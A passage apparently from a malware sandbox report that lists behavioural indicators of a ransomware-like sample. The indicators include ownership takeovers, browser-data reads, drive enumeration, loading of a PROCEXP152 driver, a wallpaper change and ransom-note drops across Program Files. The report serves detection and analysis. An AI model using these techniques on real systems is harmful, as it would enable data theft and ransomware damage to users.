takeown.exe 860 takeown.exe 1460 takeown.exe 360 takeown.exe 436 takeown.exe 1828 takeown.exe 528 takeown.exe 1120 takeown.exe 1488 takeown.exe 1784 takeown.exe 1516 takeown.exe 1960 takeown.exe 1680 takeown.exe 1880 takeown.exe 1980 takeown.exe 796 takeown.exe 224 takeown.exe 1332 takeown.exe 952 takeown.exe 2040 takeown.exe 1956 takeown.exe 1088 takeown.exe 1832 takeown.exe 1488 takeown.exe 688 takeown.exe 2040 takeown.exe 1060 takeown.exe 1776 takeown.exe 528 takeown.exe 1216 takeown.exe 1168 takeown.exe 1212 takeown.exe 624 takeown.exe 1556 takeown.exe 1556 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops desktop.ini file(s) 34 IoCs
description ioc Process File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ZMLBLRQ7\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Videos\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Pictures\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Documents\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Saved Games\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Downloads\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\RBDIK06K\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Desktop\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Music\Sample Music\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Desktop\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Favorites\Links\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Recorded TV\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Libraries\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Videos\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Pictures\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Searches\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\AJM03J3Y\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Pictures\Sample Pictures\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Windows Mail\Stationery\Desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Downloads\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Music\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\TGVUK4BG\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Music\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Contacts\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Admin\Links\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Users\Public\Documents\desktop.ini a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe -
Enumerates connected drives 3 TTPs 46 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\F: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\B: RzKn8STp64.exe File opened (read-only) \??\P: RzKn8STp64.exe File opened (read-only) \??\Q: RzKn8STp64.exe File opened (read-only) \??\Z: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\L: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\J: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\I: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\G: RzKn8STp64.exe File opened (read-only) \??\L: RzKn8STp64.exe File opened (read-only) \??\W: RzKn8STp64.exe File opened (read-only) \??\W: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\V: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\U: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\T: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\X: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\E: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\R: RzKn8STp64.exe File opened (read-only) \??\E: RzKn8STp64.exe File opened (read-only) \??\Y: RzKn8STp64.exe File opened (read-only) \??\O: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\M: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\K: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\G: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\S: RzKn8STp64.exe File opened (read-only) \??\X: RzKn8STp64.exe File opened (read-only) \??\Z: RzKn8STp64.exe File opened (read-only) \??\R: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\P: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\N: RzKn8STp64.exe File opened (read-only) \??\O: RzKn8STp64.exe File opened (read-only) \??\V: RzKn8STp64.exe File opened (read-only) \??\S: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\A: RzKn8STp64.exe File opened (read-only) \??\H: RzKn8STp64.exe File opened (read-only) \??\U: RzKn8STp64.exe File opened (read-only) \??\M: RzKn8STp64.exe File opened (read-only) \??\T: RzKn8STp64.exe File opened (read-only) \??\Q: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\I: RzKn8STp64.exe File opened (read-only) \??\J: RzKn8STp64.exe File opened (read-only) \??\K: RzKn8STp64.exe File opened (read-only) \??\Y: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\N: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\H: a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened (read-only) \??\F: RzKn8STp64.exe -
Modifies service 2 TTPs 11 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ErrorControl = "1" RzKn8STp64.exe Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" RzKn8STp64.exe Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152 RzKn8STp64.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\SwProvider_{b5946137-7b9f-4925-af80-51abd60b20d5} vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\PROCEXP152 RzKn8STp64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Type = "1" RzKn8STp64.exe Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\Start = "3" RzKn8STp64.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Roaming\\bkxIAUsR.bmp" reg.exe -
Drops file in Program Files directory 3067 IoCs
description ioc Process File created C:\Program Files\Java\jdk1.7.0_80\db\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\forms_super.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\deploy\messages_de.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fi.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Ust-Nera a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\HST a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\el.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Damascus a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.flightrecorder.ui_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Font\ZY______.PFB a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Africa\Johannesburg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Microsoft Analysis Services\AS OLEDB\10\Cartridges\Sybase.xsl a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Enderbury a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Atlantic\Stanley a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Creston a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Indian\Kerguelen a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Antigua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\fr.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\VisualBasic\1033\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.launcher.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.ql.nl_zh_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.SF a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\VDK10.CMP a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\tr.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\images\cursors\cursors.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ga\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.update.configurator.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\sk.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\EmptyDatabase.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Annotations\Stamps\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\bin\jp2launcher.exe a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Glace_Bay a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.SYD a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.help.base.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Asia\Aqtau a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\ms\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-editor-mimelookup_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.workbench.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Belize a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\ext\sunec.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.databinding.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\VisualElements\LogoBeta.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\Locales\ja.pak a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-coredump_zh_CN.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Pacific\Honolulu a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chicago a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Riyadh87 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Chuuk a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\dt.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\SystemV\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Qyzylorda a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Chihuahua a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Microsoft Visual Studio 8\Common7\IDE\VSTA\ItemTemplates\CSharp\1033\CodeFile.zip a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.babel.nls_eclipse_ja_4.4.0.v20140623020002\eclipse_update_120.jpg a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\license.html a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Cuiaba a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\feature.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.p2.metadata.repository.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\lua\http\css\ui-lightness\images\ui-bg_glass_100_f6f6f6_1x400.png a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.core.databinding.beans_1.2.200.v20140214-0004.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\classlist a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\usa03.ths a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jre7\lib\zi\Asia\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.jface.text.nl_ja_4.4.0.v20140623020002.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Google\Chrome\Application\83.0.4103.106\v8_context_snapshot.bin a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File created C:\Program Files\VideoLAN\VLC\locale\sk\LC_MESSAGES\FDFK22_INFO.rtf a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Costa_Rica a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx.ui.ja_5.5.0.165303.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\dark\e4-dark_globalstyle.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Tracker\turnOffNotificationInTray.gif a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\SystemV\HST10 a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.app_1.3.200.v20130910-1609.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.themes_1.0.1.v20140819-1717\css\e4_classic_win7.css a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-ui_ja.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_US.txt a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ecf.provider.filetransfer.ssl_1.0.0.v20140827-1444.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Europe\Moscow a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.e4.ui.workbench.addons.swt_1.1.1.v20140903-0821.jar a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\bin\server\classes.jsa a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\security\java.security a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\zi\Etc\GMT a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\Java\jre7\lib\accessibility.properties a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files\VideoLAN\VLC\locale\it\LC_MESSAGES\vlc.mo a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\CMap\Identity-H a344ab4143b6c5421294ddcf8ec51e9bdcf8dbde7c977802e30fcffd4af421c9.exe File opened for modification C:\Program 